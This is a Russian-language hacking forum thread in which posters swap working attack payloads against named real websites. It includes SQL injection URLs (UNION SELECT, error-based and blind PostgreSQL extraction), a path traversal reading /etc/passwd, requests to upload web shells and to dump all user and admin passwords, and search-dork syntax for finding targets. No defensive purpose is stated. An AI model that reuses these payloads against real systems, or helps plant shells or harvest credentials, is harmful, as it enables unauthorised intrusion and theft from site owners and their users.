PostgreSQL 9.0.3 on i386-portbld-freebsd8.2, compiled by GCC cc (GCC) 4.2.1 20070719 [FreeBSD], 32-bit Близорукая инъекция. Если через нее подбирать ascii к версии, пользователю или имени БД то все норм выводится. Когда же начинаю вычислять имена таблиц, то они мягко говоря странные и для вариантов через INFORMATION_SCHEMA и PG_TABLES они разные: INFORMATION_SCHEMA: Code: uuywywwuwuwwuwuywwuuu h u hyuuuuu uyuy uy u _hh_hhy_ yu_ h__ ___ssesosngio jc_j_ hx__ x_ vx_xxceetrinaam csccc_ ccc__cc_scxccstnrogz kesvkc_kvvjcvvcescssefroi vnessscssscvssvneveenool stneeekeeevseestnsnntip eqtnnnvnnnsennerterrpma trqtttstttenttnbqnoogp rorrrrerrrntrrtortllag flffffnzbftrbfrlbqii bibbbbtbobrbobfiorad idlooorolobolobdlb p dpilllzlilllilomio a pgdiiioidiiidilpdl aapdddldmpddpmigmd mpppippmppggdapm gmmmdmggmgaam gp agggpgaaga p aaama ASCII идентичные UTF-8 коды для вышеуказанных имен таблиц: Code: 117 117 121 119 121 119 119 117 119 117 119 119 117 119 117 121 119 119 117 117 117 104 117 104 121 117 117 117 117 117 117 121 117 121 117 121 117 95 104 104 95 104 104 121 95 121 117 95 104 95 95 95 95 95 115 115 101 115 111 115 110 103 105 111 106 99 95 106 95 104 120 95 95 120 95 118 120 95 120 120 99 101 101 116 114 105 110 97 97 109 99 115 99 99 99 95 99 99 99 95 95 99 99 95 115 99 120 99 99 115 116 110 114 111 103 122 107 101 115 118 107 99 95 107 118 118 106 99 118 118 99 101 115 99 115 115 101 102 114 111 105 118 110 101 115 115 115 99 115 115 115 99 118 115 115 118 110 101 118 101 101 110 111 111 108 115 116 110 101 101 101 107 101 101 101 118 115 101 101 115 116 110 115 110 110 116 105 112 101 113 116 110 110 110 118 110 110 110 115 101 110 110 101 114 116 101 114 114 112 109 97 116 114 113 116 116 116 115 116 116 116 101 110 116 116 110 98 113 110 111 111 103 112 114 111 114 114 114 114 101 114 114 114 110 116 114 114 116 111 114 116 108 108 97 103 102 108 102 102 102 102 110 122 98 102 116 114 98 102 114 108 98 113 105 105 98 105 98 98 98 98 116 98 111 98 114 98 111 98 102 105 111 114 97 100 105 100 108 111 111 111 114 111 108 111 98 111 108 111 98 100 108 98 112 100 112 105 108 108 108 122 108 105 108 108 108 105 108 111 109 105 111 97 112 103 100 105 105 105 111 105 100 105 105 105 100 105 108 112 100 108 97 97 112 100 100 100 108 100 109 112 100 100 112 109 105 103 109 100 109 112 112 112 105 112 112 109 112 112 103 103 100 97 112 109 103 109 109 109 100 109 103 103 109 103 97 97 109 103 112 97 103 103 103 112 103 97 97 103 97 112 97 97 97 109 97 PG_TABLES: Code: huuuywhuuuyw yyw jy__uu y cecjhhc_c _cxe___ecineo sqscs vxv_jscnveensdpta trnse_scsscestsnntapaf borencekeesnertirr dgbntsnsnnetnormoo paltretetttrtlfplg a drfnrnrrrbrio d mfbtztbfloomg poorlrobiiiaa gllfibloddg iibdoilppa ddomldimg ppipimpga gmdgdpma agpamgg am Code: 104 117 117 117 121 119 104 117 117 117 121 119 121 121 119 106 121 95 95 117 117 121 99 101 99 106 104 104 99 95 99 95 99 120 101 95 95 95 101 99 105 110 101 111 115 113 115 99 115 118 120 118 95 106 115 99 110 118 101 101 110 115 100 112 116 97 116 114 110 115 101 95 115 99 115 115 99 101 115 116 115 110 110 116 97 112 97 102 98 111 114 101 110 99 101 107 101 101 115 110 101 114 116 105 114 114 100 103 98 110 116 115 110 115 110 110 101 116 110 111 114 109 111 111 112 97 108 116 114 101 116 101 116 116 116 114 116 108 102 112 108 103 97 100 114 102 110 114 110 114 114 114 98 114 105 111 100 109 102 98 116 122 116 98 102 108 111 111 109 103 112 111 111 114 108 114 111 98 105 105 105 97 97 103 108 108 102 105 98 108 111 100 100 103 105 105 98 100 111 105 108 112 112 97 100 100 111 109 108 100 105 109 103 112 112 105 112 105 109 112 103 97 103 109 100 103 100 112 109 97 97 103 112 97 109 103 103 97 109 Пробывал делать to_ascii(TABLE_NAME), но в таком случае: Code: pg_query(): Query failed: ERROR: encoding conversion from UTF8 to ASCII not supported
Привет. Интересует заливка шелла через БД. HTML: http://www.stpatsfc.com/news.php?id=-2839%20UNION%20SELECT%201,2,3,4,5,6,file_priv%20from%20mysql.user-- Выдает ошибку: SELECT command denied to user 'stpatsf_admin'@'web6.novara.ie' for table 'user' Получается, что невозможно выполнить SELECT ... INTO DUMPFILE 'бла-бла', и шелл залить нельзя? Максимум это слить базу?
Эта ошибка означает, что у текущего пользователя БД нет доступа к таблице mysql.user. Тем не менее при этом file_priv может быть Y. Но в данном случае экранируются кавычки, так что INTO DUMPFILE не сработает в любом случаем. MySQL там 5ой версии, слей названия таблиц, поищи админку и т.д.
Думаю что кавычки это наименьшая из проблем там. Ведь у пользователя нету прав. Странно, я почему-то думал, что Magic Quotes можно обойти. Правда опыта у меня не много, пока в основном читаю литературу. Например Bernardo Damele, ведущий разработчик sqlmap, пишет по этому поводу так (http://www.slideshare.net/inquis/sql-injection-not-only-and-11-updated):
есть доступ в админку сайта, но не получается залить шелл. через менеджер изображений не получается. есть возможность добавлять свои переменные на сайте в виде массива или переменной... можно ли какой-нибудь код добавить,чтобы можно было как-то залиться шелл?
если бы всё так на деле обстояло. переменные, которые уже забиты указывают в основом как выводить картинку, как показано меню и т.д. в хтмл форме.
В двойных кавычках(С разрешением RG, или с не экранированием одинарных), или попробовать выйти за пределы переменной.
Есть вопросец.Имеется вот такой вот инклуд: Code: http://atlanticacorp.com/pages/admin/img_stats.php?file=../../../inf/config.php .Но вывод идет только одной строки ( а именно 3).Можно ли выжать что то большее?
PHP: //if($_SESSION['user_admin']>=$adminRights['stats']) { if(isset($_GET['file']) && !empty($_GET['file'])) { if(file_exists('./cache/'.$_GET['file'])) { $contents = file('./cache/'.$_GET['file']); $imgTyp = trim($contents[1]); $imgTitel = trim($contents[2]); $imgValues = trim($contents[3]); $imgStrings = trim($contents[4]); $inWerte = unserialize($imgValues); $inStrings = unserialize($imgStrings); } } Здесь не инклуд, а локальное урезанное чтение файлов. В коде жесткое ограничение, что значения берутся только с 3 строчки. Странно, что проверка на админа закомментирована.
ДАДАДА.Меня тоже удивила, как будто специально багу мастерили в двиге.Тоесть ничего не сделать?А вот нашел сайтец на похожем движке: Code: http://cwerymt2.ru/index.php?s=../../../../../../../../etc/passwd%00 Двиг аналогичный, но инклуд пашет (просто видно на том сайте нуль байт не пахал).Чисто дальнейшее развитие событий какое может быть?Как происходит залив шелла через локальный инклуд, если неизвестны пути до access.log ?
Это не инклуд а читалка. Совсем разные понятия. Всё, что ты можешь сделать с помощью этой уязвимости - читать 3-ую строчку из файлов.
Нашел SQL-инъекцию на сайте...ребята из античата раскрутили её до вывода версии, имя пользователя, таблицы... Напишите как можно из этих данных получить пароли всех пользователей в том числе и админа))) Вот SQL-инъекции http://www.tnak.am/sub/aforizm.php?act=1&uid=52&let=1/**/and/**/row(1,1)%3E(select/**/count(*),concat(version(),0x3a,floor(rand()*2))/**/x/**/from/**/(select/**/1/**/union/**/select/**/2)a/**/group/**/by/**/x/**/limit/**/1)+--+1
как отфильтровать запрос таким образом, мне например надо inurl:index.php?test= но что бы искало по контенту например powered by coolsite попробовал такую чушь inurl:index.php?test= intextowered by coolsite не канает подскажите